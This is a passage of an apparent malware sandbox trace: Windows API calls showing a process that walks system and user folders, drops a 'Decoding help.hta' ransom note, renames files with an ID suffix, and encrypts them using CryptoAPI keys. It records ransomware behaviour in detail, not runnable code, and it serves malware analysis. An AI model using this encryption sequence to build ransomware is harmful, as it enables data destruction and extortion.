ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0055.794] FindClose (in: hFindFile=0x5a53f0 | out: hFindFile=0x5a53f0) returned 1 Thread: id = 197 os_tid = 0x860 [0040.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Start Menu\\*.*", lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 198 os_tid = 0x85c [0040.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*", lpFindFileData=0xf38fd30 | out: lpFindFileData=0xf38fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a6030 [0041.483] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.483] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0xf38fd30 | out: lpFindFileData=0xf38fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.483] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.483] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.483] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0xf38fd30 | out: lpFindFileData=0xf38fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52694b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52694b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IDE", cAlternateFileName="")) returned 1 [0041.483] lstrcmpW (lpString1=".", lpString2="IDE") returned -1 [0041.483] lstrcmpW (lpString1="..", lpString2="IDE") returned -1 [0041.484] lstrcmpiW (lpString1="windows", lpString2="IDE") returned 1 [0041.484] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*" [0041.484] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*") returned 64 [0041.484] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\", lpString2="IDE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE" [0041.484] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*" [0041.484] GlobalMemoryStatus (in: lpBuffer=0xf38fd10 | out: lpBuffer=0xf38fd10) [0041.484] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41d84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0041.485] CloseHandle (hObject=0x360) returned 1 [0041.485] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0xf38fd30 | out: lpFindFileData=0xf38fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0041.485] lstrcmpW (lpString1=".", lpString2="Packages") returned -1 [0041.485] lstrcmpW (lpString1="..", lpString2="Packages") returned -1 [0041.485] lstrcmpiW (lpString1="windows", lpString2="Packages") returned 1 [0041.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*" [0041.485] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*.*") returned 64 [0041.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\", lpString2="Packages" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages" [0041.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*.*" [0041.485] GlobalMemoryStatus (in: lpBuffer=0xf38fd10 | out: lpBuffer=0xf38fd10) [0041.485] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95c9c18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0041.486] CloseHandle (hObject=0x360) returned 1 [0041.486] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0xf38fd30 | out: lpFindFileData=0xf38fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 0 [0041.486] FindClose (in: hFindFile=0x5a6030 | out: hFindFile=0x5a6030) returned 1 Thread: id = 199 os_tid = 0x858 [0040.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*.*", lpFindFileData=0xf4cfd30 | out: lpFindFileData=0xf4cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8990 [0042.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.066] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xf4cfd30 | out: lpFindFileData=0xf4cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.067] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.067] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.067] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xf4cfd30 | out: lpFindFileData=0xf4cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0042.067] lstrcmpW (lpString1=".", lpString2="logs") returned -1 [0042.067] lstrcmpW (lpString1="..", lpString2="logs") returned -1 [0042.067] lstrcmpiW (lpString1="windows", lpString2="logs") returned 1 [0042.067] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*.*" [0042.067] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*.*") returned 38 [0042.067] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\", lpString2="logs" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs" [0042.067] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*.*" [0042.067] GlobalMemoryStatus (in: lpBuffer=0xf4cfd10 | out: lpBuffer=0xf4cfd10) [0042.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98fa9e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.068] CloseHandle (hObject=0x518) returned 1 [0042.068] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xf4cfd30 | out: lpFindFileData=0xf4cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0042.068] FindClose (in: hFindFile=0x5d8990 | out: hFindFile=0x5d8990) returned 1 Thread: id = 200 os_tid = 0x854 [0040.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0xf60fd30 | out: lpFindFileData=0xf60fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5db0 [0040.485] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.485] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0xf60fd30 | out: lpFindFileData=0xf60fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.485] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.485] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.486] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0xf60fd30 | out: lpFindFileData=0xf60fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.486] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\Default\\Downloads\\*.*" [0040.486] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\*.*") returned 34 [0040.486] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Downloads\\Decoding help.hta" [0040.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\Decoding help.hta" (normalized: "c:\\users\\default\\downloads\\decoding help.hta")) returned 0xffffffff [0040.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\Decoding help.hta" (normalized: "c:\\users\\default\\downloads\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.486] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xf60fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xf60fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.487] CloseHandle (hObject=0x1b8) returned 1 [0041.487] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.488] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.488] lstrlenW (lpString="desktop.ini") returned 11 [0041.488] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\Default\\Downloads\\*.*" [0041.488] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\*.*") returned 34 [0041.488] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" [0041.488] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" [0041.488] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\downloads\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\downloads\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0041.949] CreateFileMappingA (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x26c [0041.949] CryptAcquireContextA (in: phProv=0xf60fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xf60fcec*=0x344a018) returned 1 [0045.157] CryptGenKey (in: hProv=0x344a018, Algid=0x6610, dwFlags=0x1, phKey=0xf60fce8 | out: phKey=0xf60fce8*=0x5a52b0) returned 1 [0045.157] CryptExportKey (in: hKey=0x5a52b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xf60fbe4, pdwDataLen=0xf60fce4 | out: pbData=0xf60fbe4*, pdwDataLen=0xf60fce4*=0x2c) returned 1 [0045.157] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100) returned 0x3a10000 [0045.159] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xf60fbe4*, pdwDataLen=0xf60fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xf60fbe4*, pdwDataLen=0xf60fcf8*=0x100) returned 1 [0045.159] CryptEncrypt (in: hKey=0x5a52b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a10000*, pdwDataLen=0xf60fce4*=0x100, dwBufLen=0x100 | out: pbData=0x3a10000*, pdwDataLen=0xf60fce4*=0x100) returned 1 [0045.160] UnmapViewOfFile (lpBaseAddress=0x3a10000) returned 1 [0045.161] CloseHandle (hObject=0x26c) returned 1 [0045.161] CryptDestroyKey (hKey=0x5a52b0) returned 1 [0045.161] CryptReleaseContext (hProv=0x344a018, dwFlags=0x0) returned 1 [0045.161] SetFilePointerEx (in: hFile=0x290, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.161] WriteFile (in: hFile=0x290, lpBuffer=0xf60fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xf60fcf8, lpOverlapped=0x0 | out: lpBuffer=0xf60fbe4*, lpNumberOfBytesWritten=0xf60fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.421] WriteFile (in: hFile=0x290, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xf60fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xf60fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.421] CloseHandle (hObject=0x290) returned 1 [0045.423] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.423] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0xf60fd30 | out: lpFindFileData=0xf60fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.423] FindClose (in: hFindFile=0x5a5db0 | out: hFindFile=0x5a5db0) returned 1 Thread: id = 201 os_tid = 0x850 [0040.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Sun\\*.*", lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5df0 [0040.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.487] FindNextFileW (in: hFindFile=0x5a5df0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.487] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.487] FindNextFileW (in: hFindFile=0x5a5df0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0040.487] lstrcmpW (lpString1=".", lpString2="Java") returned -1 [0040.487] lstrcmpW (lpString1="..", lpString2="Java") returned -1 [0040.487] lstrcmpiW (lpString1="windows", lpString2="Java") returned 1 [0040.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Sun\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Sun\\*.*" [0040.487] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Sun\\*.*") returned 30 [0040.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\", lpString2="Java" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java" [0040.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\*.*" [0040.488] GlobalMemoryStatus (in: lpBuffer=0xf74fd10 | out: lpBuffer=0xf74fd10) [0040.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x992aab8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a8 [0040.489] CloseHandle (hObject=0x2a8) returned 1 [0040.489] FindNextFileW (in: hFindFile=0x5a5df0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0040.489] FindClose (in: hFindFile=0x5a5df0 | out: hFindFile=0x5a5df0) returned 1 Thread: id = 202 os_tid = 0x84c [0040.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\*.*", lpFindFileData=0xf88fd30 | out: lpFindFileData=0xf88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7fd0 [0040.783] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.783] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0xf88fd30 | out: lpFindFileData=0xf88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.783] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.783] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.783] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0xf88fd30 | out: lpFindFileData=0xf88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 1 [0040.783] lstrcmpW (lpString1=".", lpString2="Windows Workflow Foundation") returned -1 [0040.783] lstrcmpW (lpString1="..", lpString2="Windows Workflow Foundation") returned -1 [0040.783] lstrcmpiW (lpString1="windows", lpString2="Windows Workflow Foundation") returned -1 [0041.203] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\*.*" [0041.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\*.*") returned 42 [0041.203] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\", lpString2="Windows Workflow Foundation" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation" [0041.203] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows 